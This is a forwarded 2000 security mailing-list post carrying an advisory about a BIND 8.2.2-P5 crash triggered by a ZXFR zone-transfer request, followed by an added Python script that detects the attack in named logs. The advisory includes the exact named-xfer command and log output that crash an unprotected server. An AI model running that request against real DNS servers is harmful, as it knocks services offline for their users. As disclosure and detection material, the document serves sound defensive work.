
[cobalt-security] Fwd: [EXPL] BIND 8.2.2-P5 DoS vulnerability (exploit, BIND_ZXFR)



is cobalt gonna pay attention to this? i already compiled 8.2.3-t6b on my cobalts..

Date: Thu, 9 Nov 2000 07:52:52 +0100 (CET)
From: support@xxxxxxxxxxxxxx
To: list@xxxxxxxxxxxxxx
Subject: [EXPL] BIND 8.2.2-P5 DoS vulnerability (exploit, BIND_ZXFR)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com


  BIND 8.2.2-P5 DoS vulnerability (exploit, BIND_ZXFR)
------------------------------------------------------------------------


SUMMARY

A security vulnerability has been discovered in BIND. The bug involves the
ZXFR feature: if the BIND_ZXFR feature has been disabled, sending the
server a request for a zone transfer may cause the BIND DNS server to
crash.

DETAILS

Vulnerable systems:
BIND 8.2.2-P5

Exploit:

We'll transfer the zone zone.example.com from the DNS server
dns.example.com (192.168.1.1) from the host attacker.example.org
(10.10.10.10). This will actually crash the server.

We will send a zone transfer request using the "-Z" switch, meaning we wish
to use ZXFR. dns.example.com doesn't support ZXFR and does not have
"allow-transfer{}" configured, so anyone can ask it for *.zone.example.com.

$ ./named-xfer  -z zone.example.com  -d 9 -f pics -Z dns.example.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.example.com"

On the server's log:

Nov  7 11:19:09 dns.example.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.example.com"
Nov  7 11:19:09 dns.example.com: named[188510]: unsupported XFR (type ZXFR) of "zone.example.com" (IN) to [10.10.10.10].2284

The server then crashes.


ADDITIONAL INFORMATION

The information has been provided by Fabio Pietrosanti (naif)
<mailto:fabio@xxxxxxxxxxx>.



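
A log check for the two named messages quoted in the advisory, added here as an example (it is not part of the advisory or of BIND). It flags every "unsupported XFR" line, notes whether the same request had passed the transfer ACL, and notes whether named later logs under a different pid. The first and last sample lines, the secondary address 192.168.1.2 and the "starting" message are constructed assumptions.

```python
import re

# Patterns follow the two named log lines quoted in the advisory.
APPROVED = re.compile(
    r'named\[(?P<pid>\d+)\]: approved (?P<type>[A-Z]XFR) from '
    r'\[(?P<src>[\d.]+)\]\.(?P<port>\d+) for "(?P<zone>[^"]+)"')
UNSUPPORTED = re.compile(
    r'named\[(?P<pid>\d+)\]: unsupported XFR \(type (?P<type>\w+)\) of '
    r'"(?P<zone>[^"]+)" \(\w+\) to \[(?P<src>[\d.]+)\]\.(?P<port>\d+)')
NAMED_PID = re.compile(r'named\[(\d+)\]:')

# First and last lines are constructed; the middle two are the advisory's
# log lines with the mail line-wrap undone.
SAMPLE_LOG = [
    'Nov  7 10:02:13 dns.example.com: named[188510]: approved AXFR from '
    '[192.168.1.2].1042 for "zone.example.com"',
    'Nov  7 11:19:09 dns.example.com: named[188510]: approved ZXFR from '
    '[10.10.10.10].2284 for "zone.example.com"',
    'Nov  7 11:19:09 dns.example.com: named[188510]: unsupported XFR (type '
    'ZXFR) of "zone.example.com" (IN) to [10.10.10.10].2284',
    'Nov  7 11:24:41 dns.example.com: named[188742]: starting',
]

def find_unsupported_xfr(lines, known_secondaries=()):
    """Return one finding per 'unsupported XFR' line, with triage context."""
    approved, findings = set(), []
    for idx, line in enumerate(lines):
        m = APPROVED.search(line)
        if m:  # remember requests that passed the transfer ACL
            approved.add((m['pid'], m['src'], m['port'], m['zone']))
            continue
        m = UNSUPPORTED.search(line)
        if not m:
            continue
        # A later named line under another pid means the daemon restarted.
        later = {p[1] for l in lines[idx + 1:] if (p := NAMED_PID.search(l))}
        findings.append({
            'source': m['src'], 'zone': m['zone'], 'xfr_type': m['type'],
            'passed_acl': (m['pid'], m['src'], m['port'], m['zone']) in approved,
            'known_secondary': m['src'] in known_secondaries,
            'named_pid_changed': bool(later - {m['pid']}),
        })
    return findings

if __name__ == '__main__':
    for f in find_unsupported_xfr(SAMPLE_LOG, known_secondaries={'192.168.1.2'}):
        print(f)
```

A finding with passed_acl true and known_secondary false means the transfer ACL let an unknown host through, which is the "allow-transfer{}" gap the advisory describes.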